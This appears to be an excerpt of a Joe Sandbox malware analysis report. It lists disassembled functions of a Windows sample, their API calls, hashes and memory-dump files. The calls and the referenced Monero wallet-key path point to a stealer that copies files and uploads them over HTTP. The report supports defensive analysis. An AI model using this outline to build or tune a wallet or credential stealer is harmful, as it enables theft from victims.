Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: 07b4b34ac68db6015949b740804f7395b3eca7236929ce7b9edd59ba70421457
Instruction ID: 65a18580f5ce7e34ce2fcc5b753e1ca2f09a158ae463d8ea1d431d547f7ea009
Opcode Fuzzy Hash: 07b4b34ac68db6015949b740804f7395b3eca7236929ce7b9edd59ba70421457
Instruction Fuzzy Hash: AC321E71A20118ABDB14EBA0DC95FEFB378BF55701F404299B90666093EF706A4DCF62

Function 0004A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005AA70: StrCmpCA.SHLWAPI(00CE8930,0004A7A7,?,0004A7A7,00CE8930), ref: 0005AA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0004AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0004AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0004ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0004A8B0

Part of subcall function 0005A820: lstrlen.KERNEL32(00044F05,?,?,00044F05,00060DDE), ref: 0005A82B
Part of subcall function 0005A820: lstrcpy.KERNEL32(00060DDE,00000000), ref: 0005A885

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

lstrcat.KERNEL32(?,00000000), ref: 0004ACEB
lstrcat.KERNEL32(?,00061320), ref: 0004ACFA
lstrcat.KERNEL32(?,00000000), ref: 0004AD0D
lstrcat.KERNEL32(?,00061324), ref: 0004AD1C
lstrcat.KERNEL32(?,00000000), ref: 0004AD2F
lstrcat.KERNEL32(?,00061328), ref: 0004AD3E
lstrcat.KERNEL32(?,00000000), ref: 0004AD51
lstrcat.KERNEL32(?,0006132C), ref: 0004AD60
lstrcat.KERNEL32(?,00000000), ref: 0004AD73
lstrcat.KERNEL32(?,00061330), ref: 0004AD82
lstrcat.KERNEL32(?,00000000), ref: 0004AD95
lstrcat.KERNEL32(?,00061334), ref: 0004ADA4
lstrcat.KERNEL32(?,00000000), ref: 0004ADB7
lstrlen.KERNEL32(?), ref: 0004AE0D
lstrlen.KERNEL32(?), ref: 0004AE1C

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

DeleteFileA.KERNEL32(00000000), ref: 0004AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0004ABD4

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 723566283c960c6378bf03dc98fc3196a73f03a85795a91b07fdd41104b7f96b
Instruction ID: 4190469843d7fde962036395259fb1bff6c8e4688a4209e1b73c0dcf3f59cc45
Opcode Fuzzy Hash: 723566283c960c6378bf03dc98fc3196a73f03a85795a91b07fdd41104b7f96b
Instruction Fuzzy Hash: 3C120375A101189BDB04EBA0DD96EFF7379BF15302F504259B907A6092EF346E0DCB62

Function 00045960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
Part of subcall function 000447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000459F8
StrCmpCA.SHLWAPI(?,00CEF068), ref: 00045A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00045B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00CEF1A8,00000000,?,00CE99E8,00000000,?,00061A1C), ref: 00045E71
lstrlen.KERNEL32(00000000), ref: 00045E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00045E93
RtlAllocateHeap.NTDLL(00000000), ref: 00045E9A
lstrlen.KERNEL32(00000000), ref: 00045EAF
lstrlen.KERNEL32(00000000), ref: 00045ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00045EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00045F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00045F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00045F4C
InternetCloseHandle.WININET(00000000), ref: 00045FB0
InternetCloseHandle.WININET(00000000), ref: 00045FBD
HttpOpenRequestA.WININET(00000000,00CEF098,?,00CEEA28,00000000,00000000,00400100,00000000), ref: 00045BF8

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

InternetCloseHandle.WININET(00000000), ref: 00045FC7

Strings

", xrefs: 00045CD5
------, xrefs: 00045D4C
------, xrefs: 00045A96
------, xrefs: 00045C0B
", xrefs: 00045E16

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 94724ce35eec22bc55372bd57e0ac4acf786d5f02b31460eb743798b0aad2fed
Instruction ID: 00f0fccba2398a77775685d621e02782d70269fad87de2834972353740c37547
Opcode Fuzzy Hash: 94724ce35eec22bc55372bd57e0ac4acf786d5f02b31460eb743798b0aad2fed
Instruction Fuzzy Hash: 9A120171920118ABDB15EBA0DC99FEFB378BF15701F5042A9F50662092EF702A4DCF66

Function 0004CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 00058B60: GetSystemTime.KERNEL32(00060E1A,00CE9808,000605AE,?,?,000413F9,?,0000001A,00060E1A,00000000,?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 00058B86

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0004CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0004D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0004D0CE
lstrcat.KERNEL32(?,00000000), ref: 0004D208
lstrcat.KERNEL32(?,00061478), ref: 0004D217
lstrcat.KERNEL32(?,00000000), ref: 0004D22A
lstrcat.KERNEL32(?,0006147C), ref: 0004D239
lstrcat.KERNEL32(?,00000000), ref: 0004D24C
lstrcat.KERNEL32(?,00061480), ref: 0004D25B
lstrcat.KERNEL32(?,00000000), ref: 0004D26E
lstrcat.KERNEL32(?,00061484), ref: 0004D27D
lstrcat.KERNEL32(?,00000000), ref: 0004D290
lstrcat.KERNEL32(?,00061488), ref: 0004D29F
lstrcat.KERNEL32(?,00000000), ref: 0004D2B2
lstrcat.KERNEL32(?,0006148C), ref: 0004D2C1
lstrcat.KERNEL32(?,00000000), ref: 0004D2D4
lstrcat.KERNEL32(?,00061490), ref: 0004D2E3

Part of subcall function 0005A820: lstrlen.KERNEL32(00044F05,?,?,00044F05,00060DDE), ref: 0005A82B
Part of subcall function 0005A820: lstrcpy.KERNEL32(00060DDE,00000000), ref: 0005A885

lstrlen.KERNEL32(?), ref: 0004D32A
lstrlen.KERNEL32(?), ref: 0004D339

Part of subcall function 0005AA70: StrCmpCA.SHLWAPI(00CE8930,0004A7A7,?,0004A7A7,00CE8930), ref: 0005AA8F

DeleteFileA.KERNEL32(00000000), ref: 0004D3B4

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: d5f375623837121c3f388db9033ae780b2d8daa2f94871b29c2d61b32937f5d9
Instruction ID: 931e85262b9af572315a0769649c9d5c7ae241bef2df834ef696bb3c7f10eda5
Opcode Fuzzy Hash: d5f375623837121c3f388db9033ae780b2d8daa2f94871b29c2d61b32937f5d9
Instruction Fuzzy Hash: 8AE10275A10108ABDB04EBA0DD99EEF7379BF15302F504255F507A7092EF35AA0DCB62

Function 00058320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

RegOpenKeyExA.KERNEL32(00000000,00CEAF38,00000000,00020019,00000000,000605B6), ref: 000583A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00058426
wsprintfA.USER32 ref: 00058459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0005847B
RegCloseKey.ADVAPI32(00000000), ref: 0005848C
RegCloseKey.ADVAPI32(00000000), ref: 00058499

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Strings

- , xrefs: 000585A3
?, xrefs: 0005837A
%s\%s, xrefs: 0005844D

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: d1ed07d79d9ad6f6c01432d401cc1c663a0ae8328d4fa9fc6d66f083f978dad9
Instruction ID: 672aab588ae7252f8a28ed9f32fe000fd3e4b771e3a050a42837286eaaad6838
Opcode Fuzzy Hash: d1ed07d79d9ad6f6c01432d401cc1c663a0ae8328d4fa9fc6d66f083f978dad9
Instruction Fuzzy Hash: 14810B7191111CABEB24DB50DC95FEAB7B8BF08701F008299E909A6181DF756F89CFA1

Function 00046280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 000447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
Part of subcall function 000447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

InternetOpenA.WININET(00060DFE,00000001,00000000,00000000,00000000), ref: 000462E1
StrCmpCA.SHLWAPI(?,00CEF068), ref: 00046303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00046335
HttpOpenRequestA.WININET(00000000,GET,?,00CEEA28,00000000,00000000,00400100,00000000), ref: 00046385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000463BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000463D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000463FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0004646D
InternetCloseHandle.WININET(00000000), ref: 000464EF
InternetCloseHandle.WININET(00000000), ref: 000464F9
InternetCloseHandle.WININET(00000000), ref: 00046503

Strings

GET, xrefs: 0004637C
ERROR, xrefs: 00046407
ERROR, xrefs: 000464C9

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: ce6f10eaef676c982ff6fdc3e284985a75c50942613c8517ead7241ef57cd84a
Instruction ID: 4f4d9ba7d1529ae686c8d4b4438fbdf71bc804b2401f2f4057aed9be753dd0e6
Opcode Fuzzy Hash: ce6f10eaef676c982ff6fdc3e284985a75c50942613c8517ead7241ef57cd84a
Instruction Fuzzy Hash: 5171A275A00208ABEF24DF90DC49BEE77B4FB45701F1081A9F5066B181EBB56A89CF52

Function 00055510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A820: lstrlen.KERNEL32(00044F05,?,?,00044F05,00060DDE), ref: 0005A82B
Part of subcall function 0005A820: lstrcpy.KERNEL32(00060DDE,00000000), ref: 0005A885

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00055644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000556A1
